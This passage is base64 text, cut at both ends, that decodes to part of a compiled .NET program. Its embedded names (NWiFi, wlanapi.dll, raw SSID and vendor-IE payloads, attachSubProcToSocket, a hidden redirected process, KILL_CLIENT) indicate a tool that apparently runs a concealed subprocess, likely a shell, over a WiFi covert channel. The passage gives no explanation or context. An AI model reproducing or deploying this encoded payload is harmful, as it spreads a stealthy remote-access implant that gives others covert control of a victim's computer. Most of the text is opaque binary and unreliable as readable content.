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RwBTAF8AagB8AKIArQC6ANYA4gDsAP4ACQEYAWwBqgGvAcABzgH5Af8BCQJxAo0CnAKhAssC0gLZAt4C4wL5AgIAAQAPAAIAAADJEVMFAABpEFcFAgABAAMAAQACAAMAAgAuAAUAHAwWDQoNGgAnAIcAEQGeAegBMwIAAT0A9Q8BAAABPwA/BwIAAAFBAOEGAQBAAUMAZg0DAAABRQBuEgIAAAFHAMwNAgAEgAAAAQAAAAAAAAAAAAAAAAALDAAAAgAAAAAAAAAAAAAAIAN2AwAAAAACAAAAAAAAAAAAAAAgAz8NAAAAAAgABwAJAAcACgAHAAsABwAMAAcADQAHAA4ABwAPAAcAEAAHABEABwASAAcAEwAHABQABwAVAAcAFgAHAAAAAAAEALICAAAAQ1RMTV9UWVBFX0NPTl9JTklUX1JTUDEAQ1RMTV9UWVBFX0NPTl9JTklUX1JFUTEASUVudW1lcmFibGVgMQBMaW1pdGVkUXVldWVgMQBMaXN0YDEAcGF5MQBJbnQzMgBDVExNX1RZUEVfQ09OX0lOSVRfUlNQMgBDVExNX1RZUEVfQ09OX0lOSVRfUkVRMgBQYWNrZXQyAHBheTIAVG9JbnQ2NABzaW1wbGVDaGVja3N1bTE2AFVJbnQxNgBnZXRfVVRGOABzaW1wbGVDaGVja3N1bTgAPE1vZHVsZT4AUkFXX0lFX0RBVEEAQ1RMTV9UWVBFX1JFU0VUX0xJU1RFTklOR19QUk9DAENPTl9SRVNFVF9SRUFTT05fVU5TUEVDSUZJRUQARE9UMTFfU1NJRAB1Y1NTSUQAQ09OX1JFU0VUX1JFQVNPTl9JTlZBTElEX0NMSUVOVF9JRABjbGllbnRJRABzcnZJRABNVFVfV0lUSF9WRU5fSUUATVRVX1dJVEhPVVRfVkVOX0lFAFNUQVRFX1BFTkRJTkdfQ0xPU0UAU1RBVEVfREVMRVRFAENUTE1fVFlQRV9TRVRfQ0xJRU5UX1BPTExfSU5URVJWQUxMAHdpdGhfVEwAQUNNAE9GRE0ATVNNAFBBWTFfTUFYX0xFTgBQQVkyX01BWF9MRU4AU1RBVEVfT1BFTgBQRU5ESU5HX09QRU4AU3lzdGVtLklPAEVSUABDTF9WRVJfR1RfWFAAQ1RMTV9UWVBFX0NMRUFSX1FVRVVFUwBGSFNTAEhSRFNTUwBDVExNX1RZUEVfQ09OX1JFU0VUAENUTE1fVFlQRV9LSUxMX0NMSUVOVABDT05fUkVTRVRfUkVBU09OX0tJTExfQ0xJRU5UAFNUQVRFX1BFTkRJTkdfQUNDRVBUAE1UVQBJSFYAY2xpZW50SVYAdmFsdWVfXwBiYQBkYQBzYQBnZXRfRGF0YQBwb3BJbmJvdW5kRGF0YQBwdXNoT3V0Ym91bmREYXRhAGxlbkllRGF0YQBwSWVEYXRhAGhhc0luRGF0YQBXbGFuTm90aWZpY2F0aW9uRGF0YQBub3RpZmljYXRpb25EYXRhAHdhaXRGb3JEYXRhAG5vdGlmeURhdGEAcmF3X3NzaWRfZGF0YQByYXdfdmVuX2llX2RhdGEAbXNjb3JsaWIAZGF0YUJsb2IAU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMAQ2xpZW50U3ViUHJvYwBjb25uZWN0QW5kQmluZFByb2MAcHJvYwBwaHlJZABUaHJlYWQAc2VuZF9yZWNlaXZlX3RocmVhZABBZGQAQXV0b2NvbmZFbmFibGVkAEJhY2tncm91bmRTY2FuRW5hYmxlZABzZWN1cml0eUVuYWJsZWQAQXV0b2NvbmZEaXNhYmxlZABCYWNrZ3JvdW5kU2NhbkRpc2FibGVkAEFkSG9jTmV0d29ya0Zvcm1lZABDb25uZWN0ZWQARGlzY29ubmVjdGVkAFByb2ZpbGVzRXhoYXVzdGVkAGFkZF9FcnJvckRhdGFSZWNlaXZlZABhZGRfT3V0cHV0RGF0YVJlY2VpdmVkAHBSZXNlcnZlZAByZXNlcnZlZABzZXJ2ZXJfaWQAcERvdDExU3NpZABkb3QxMVNzaWQAZ2VuZXJhdGVSYXdTc2lkAGRvdDExQnNzaWQAcEludGVyZmFjZUd1aWQAaW50ZXJmYWNlR3VpZABpbnRlcmZhY2VfZ3VpZABpZl9ndWlkADxMaW1pdD5rX19CYWNraW5nRmllbGQASUhWX0VuZABJckJhc2ViYW5kAGNvbW1hbmQAU2VuZABtZXRob2QAYmVhY29uUGVyaW9kAGdlbmVyYXRlUmF3VmVuSWUAZXh0cmFjdEllAFJlcGxhY2UAcHJldk5vdGlmU291cmNlAG5vdGlmU291cmNlAFdsYW5Ob3RpZmljYXRpb25Tb3VyY2UAbm90aWZpY2F0aW9uU291cmNlAHNvdXJjZQBub3RpZmljYXRpb25Db2RlAHJlYXNvbl9jb2RlAEZsYWdDb250cm9sTWVzc2FnZQBBZGRSYW5nZQBQcm9maWxlQ2hhbmdlAFByb2ZpbGVOYW1lQ2hhbmdlAEJzc1R5cGVDaGFuZ2UAQWRob2NOZXR3b3JrU3RhdGVDaGFuZ2UAUG93ZXJTZXR0aW5nQ2hhbmdlAEZpbHRlckxpc3RDaGFuZ2UARW5kSW52b2tlAEJlZ2luSW52b2tlAE5ldHdvcmtBdmFpbGFibGUATmV0d29ya05vdEF2YWlsYWJsZQBSdW50aW1lVHlwZUhhbmRsZQBXbGFuQ2xvc2VIYW5kbGUAY2xvc2VOYXRpdmVXaWZpSGFuZGxlAG9wZW5OYXRpdmVXaWZpSGFuZGxlAG5hdGl2ZVdpZmlIYW5kbGUAR2V0VHlwZUZyb21IYW5kbGUAV2xhbk9wZW5IYW5kbGUARXZlbnRXYWl0SGFuZGxlAGhDbGllbnRIYW5kbGUAbmF0aXZlV2lGaUNsaWVudEhhbmRsZQBjbGllbnRIYW5kbGUAbndpZmlfY2xpZW50X2hhbmRsZQBDb25zb2xlAFdhaXRPbmUAQmVnaW5FcnJvclJlYWRMaW5lAEJlZ2luT3V0cHV0UmVhZExpbmUAV3JpdGVMaW5lAE5vbmUAVmFsdWVUeXBlAERvdDExQnNzVHlwZQBkb3QxMUJzc1R5cGUARG90MTFQaHlUeXBlAGRvdDExQnNzUGh5VHlwZQBzZWFyY2hlZF9pZV90eXBlAGN0bG1fdHlwZQBQdHJUb1N0cnVjdHVyZQBJbmZyYXN0cnVjdHVyZQBDbG9zZQBEaXNwb3NlAGlnbm9yZUR1cGxpY2F0ZQBXbGFuTm90aWZpY2F0aW9uQ2FsbGJhY2tEZWxlZ2F0ZQBNdWx0aWNhc3REZWxlZ2F0ZQBhZ2dyZWdhdGUAV2xhbkludGVyZmFjZVN0YXRlAERlYnVnZ2VyQnJvd3NhYmxlU3RhdGUAaXNTdGF0ZQBTb2NrZXRTdGF0ZQBzdGF0ZQB3YWl0U2NhbkNvbXBsZXRlAENvbm5lY3Rpb25Db21wbGV0ZQBXcml0ZQBDb21waWxlckdlbmVyYXRlZEF0dHJpYnV0ZQBHdWlkQXR0cmlidXRlAERlYnVnZ2FibGVBdHRyaWJ1dGUARGVidWdnZXJCcm93c2FibGVBdHRyaWJ1dGUAQ29tVmlzaWJsZUF0dHJpYnV0ZQBBc3NlbWJseVRpdGxlQXR0cmlidXRlAEFzc2VtYmx5VHJhZGVtYXJrQXR0cmlidXRlAEFzc2VtYmx5RmlsZVZlcnNpb25BdHRyaWJ1dGUAQXNzZW1ibHlDb25maWd1cmF0aW9uQXR0cmlidXRlAEFzc2VtYmx5RGVzY3JpcHRpb25BdHRyaWJ1dGUARmxhZ3NBdHRyaWJ1dGUAQ29tcGlsYXRpb25SZWxheGF0aW9uc0F0dHJpYnV0ZQBBc3NlbWJseVByb2R1Y3RBdHRyaWJ1dGUAQXNzZW1ibHlDb3B5cmlnaHRBdHRyaWJ1dGUAQXNzZW1ibHlDb21wYW55QXR0cmlidXRlAFJ1bnRpbWVDb21wYXRpYmlsaXR5QXR0cmlidXRlAHNldF9Vc2VTaGVsbEV4ZWN1dGUAUmVhZEJ5dGUAaW5fcXVldWUAb3V0X3F1ZXVlAERlcXVldWUARW5xdWV1ZQB2YWx1ZQBSZWNlaXZlAGR3RGF0YVNpemUAZGF0YVNpemUAaWVTaXplAHRvdGFsU2l6ZQBzaXplAFNpemVPZgBzb2NrX2luX2J1ZgBTeXN0ZW0uVGhyZWFkaW5nAEVuY29kaW5nAGJsb2NraW5nAHJ4VmVuSWVXb3JraW5nAHR4VmVuSWVXb3JraW5nAERpc2NvdmVyaW5nAFRvU3RyaW5nAEdldFN0cmluZwBBdXRoZW50aWNhdGluZwBBc3NvY2lhdGluZwBEaXNjb25uZWN0aW5nAEZsdXNoAHB1c2gATWF0aABldGgAdVNTSURMZW5ndGgAZ2V0X0xlbmd0aAByYXRlU2V0TGVuZ3RoAE5XaUZpAE5hdGl2ZVdpZmkAV2xhbmFwaQBwc2kAcnNzaQBmdW5jQ2FsbGJhY2sAQXN5bmNDYWxsYmFjawBjYWxsYmFjawBibG9jawBjc29jawBQZWVrAEFsbG9jSEdsb2JhbABGcmVlSEdsb2JhbABNYXJzaGFsAGRhdGFQdXNoZWRTaWduYWwAZGF0YVBvcHBlZFNpZ25hbABJbnRlcmZhY2VBcnJpdmFsAEludGVyZmFjZVJlbW92YWwAU3lzdGVtLkNvbXBvbmVudE1vZGVsAFNjYW5GYWlsAENvbm5lY3Rpb25BdHRlbXB0RmFpbABBbGwATldpRmkuZGxsAFdsYW5hcGkuZGxsAHdsYW5hcGkuZGxsAFdsYW5Ob3RpZmljYXRpb25Db2RlQWNtAGl0ZW0AU3lzdGVtAFJhbmRvbQBFbnVtAGNoZWNrTGVuZ3RoQ2hlY2tzdW0AV2xhblNjYW4AQm9vbGVhbgBsZW4ATWluAGluUmVnRG9tYWluAGRlc2lyZWRWZXJzaW9uAG5lZ290aWF0ZWRWZXJzaW9uAGNsaWVudFZlcnNpb24AT25BQ01Ob3RpZmljYXRpb24AV2xhblJlZ2lzdGVyTm90aWZpY2F0aW9uAGNhcGFiaWxpdHlJbmZvcm1hdGlvbgBTeXN0ZW0uUmVmbGVjdGlvbgBBcmd1bWVudE91dE9mUmFuZ2VFeGNlcHRpb24AQWNjZXNzVmlvbGF0aW9uRXhjZXB0aW9uAGludGVyZmFjZURlc2NyaXB0aW9uAHNvY2tldF9jbG9zZV9yZWFzb24AcnVuAFVua25vd24AV2xhbkludGVyZmFjZUluZm8Ac2V0X1N0YXJ0SW5mbwBQcm9jZXNzU3RhcnRJbmZvAFplcm8AU2xlZXAAaG9zdFRpbWVzdGFtcAB0aW1lc3RhbXAAc2VuZF9yZWNlaXZlX2xvb3AAcG9wAHNlcQBDbGVhcgBXbGFuSW50ZXJmYWNlSW5mb0xpc3RIZWFkZXIAV2xhbkJzc0xpc3RIZWFkZXIAQnVmZmVyAGJ1ZmZlcgBEYXRhUmVjZWl2ZWRFdmVudEhhbmRsZXIAb3V0X2hhbmRsZXIASGVscGVyAFN0cmVhbVdyaXRlcgBUZXh0V3JpdGVyAEJpdENvbnZlcnRlcgBzZXRfUmVkaXJlY3RTdGFuZGFyZEVycm9yAC5jdG9yAC5jY3RvcgBkYXRhUHRyAHJlc2VydmVkUHRyAFN0cnVjdHVyZVRvUHRyAEludFB0cgBieXRlczJoZXhTdHIAZXRoYWRkcjJzdHIAU3lzdGVtLkRpYWdub3N0aWNzAFdsYW5FbnVtSW50ZXJmYWNlcwBlbnVtSW50ZXJmYWNlcwBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBEZWJ1Z2dpbmdNb2RlcwBnZXRfUmF0ZXMAR2V0Qnl0ZXMATmV4dEJ5dGVzAERhdGFSZWNlaXZlZEV2ZW50QXJncwBkYXRhX2FyZ3MAdGltZW91dE1pbGxpcwBudW1iZXJPZkl0ZW1zAEdldFJhdGVJbk1icHMAUHJvY2VzcwBtYXhBdHRlbXB0cwBjb25fYXR0ZW1wdHMAY29ubmVjdGlvbl9hdHRlbXB0cwBDb25jYXQARm9ybWF0AE9iamVjdABvYmplY3QAQ29ubmVjdABvbkRpc2Nvbm5lY3QAV2xhblJhdGVTZXQAd2xhblJhdGVTZXQAcmF0ZVNldABwYXJzZTJwYWNrZXQAbGFzdF9yeF9wYWNrZXQAdHhfcGFja2V0AG91dHBhY2tldABhdHRhY2hTdWJQcm9jVG9Tb2NrZXQAQ2xpZW50U29ja2V0AHNvY2tldABpZU9mZnNldABzcGxpdABnZXRfTGltaXQAc2V0X0xpbWl0AGxpbWl0AElBc3luY1Jlc3VsdAByZXN1bHQAZG90MTFTc2lkSW50AEluZGVwZW5kZW50AG9uS2lsbENsaWVudABDb21wb25lbnQAQXV0b1Jlc2V0RXZlbnQAZ2V0X0NvdW50AElIVl9TdGFydABUaHJlYWRTdGFydABDb25uZWN0aW9uU3RhcnQAc3RhcnQAcHBJbnRlcmZhY2VMaXN0AFdsYW5HZXROZXR3b3JrQnNzTGlzdAB3bGFuQnNzTGlzdABwcmludF9vdXQAZ2V0X1N0YW5kYXJkSW5wdXQAc2V0X1JlZGlyZWN0U3RhbmRhcmRJbnB1dABpbnB1dABzZXRfUmVkaXJlY3RTdGFuZGFyZE91dHB1dABTeXN0ZW0uVGV4dABjYWxsYmFja0NvbnRleHQAY29udGV4dABTZW5kUmVjdgBzZXRfQ3JlYXRlTm9XaW5kb3cAcmF0ZUluZGV4AGluZGV4AHN1YkFycmF5AFRvQXJyYXkAY2hDZW50ZXJGcmVxdWVuY3kATm90UmVhZHkAQW55AEJsb2NrQ29weQBXbGFuQnNzRW50cnkAbGlua1F1YWxpdHkAb3BfRXF1YWxpdHkAU2VjdXJpdHkAAABTewAwADoAWAAyAH0AOgB7ADEAOgBYADIAfQA6AHsAMgA6AFgAMgB9ADoAewAzADoAWAAyAH0AOgB7ADQAOgBYADIAfQA6AHsANQA6AFgAMgB9AAAJbgB1AGwAbAAAAy0AAQEAW0UAcgByAG8AcgAgAGcAZQBuAGUAcgBhAHQAaQBuAGcAIAByAGEAdwAgAFMAUwBJAEQALAAgAG4AbwAgAHAAYQB5AGwAbwBhAGQAIABkAGUAZgBpAG4AZQBkAABdRQByAHIAbwByACAAZwBlAG4AZQByAGEAdABpAG4AZwAgAHIAYQB3ACAAdgBlAG4ASQBlACwAIABuAG8AIABwAGEAeQBsAG8AYQBkACAAZABlAGYAaQBuAGUAZAAAD1AAYQBjAGsAZQB0AAoAABMJAFMAQQA6AAkAewAwAH0ACgAAEwkARABBADoACQB7ADAAfQAKAAAfCQBjAGwAaQBlAG4AdABJAEQAOgAJAHsAMAB9AAoAABkJAHMAcgB2AEkARAA6AAkAewAwAH0ACgAALwkAUwBTAEkARAAgAHAAYQB5AGwAbwBhAGQAIABsAGUAbgA6AAkAewAwAH0ACgAAJwkAUwBTAEkARAAgAHAAYQB5AGwAbwBhAGQAOgAJAHsAMAB9AAoAACkJAFYAZQBuAGQAbwByACAASQBFACAAcgBhAHcAOgAJAHsAMAB9AAoAADsJAFYAZQBuAGQAbwByACAASQBFACAAIABwAGEAeQBsAG8AYQBkACAAbABlAG4AOgAJAHsAMAB9AAoAADMJAFYAZQBuAGQAbwByACAASQBFACAAIABwAGEAeQBsAG8AYQBkADoACQB7ADAAfQAKAAA3CQBGAGwAYQBnACAAQwBvAG4AdAByAG8AbAAgAE0AZQBzAHMAYQBnAGUAOgAJAHsAMAB9AAoAACEJAEMAVABMAE0AXwBUAFkAUABFADoACQB7ADAAfQAKAAAVCQBTAEUAUQA6AAkAewAwAH0ACgAAFQkAQQBDAEsAOgAJAHsAMAB9AAoAAF1DAG8AbgBuAGUAYwB0AGkAbwBuACAAcgBlAHMAZQB0ACAAZgByAG8AbQAgAHMAZQByAHYAZQByACwAIAByAGUAYQBzAG8AbgAgAGMAbwBkAGUAOgAgAHsAMAB9AAA9UwBlAHIAdgBlAHIAIABpAHMAcwB1AGUAZAAgAEsASQBMAEwAIABDAEwASQBFAE4AVAA6ACAAewAwAH0AAFFDAG8AbgBuAGUAYwB0ACAASQBuAGkAdAAgAFIAZQBxAHUAZQBzAHQAIAAxACAAKAB0AG8AIABzAHIAdgBJAEQAIAB7ADAAfQApAC4ALgAuAAB7LgAuAC4AIABjAG8AbgBuAGUAYwB0ACAAS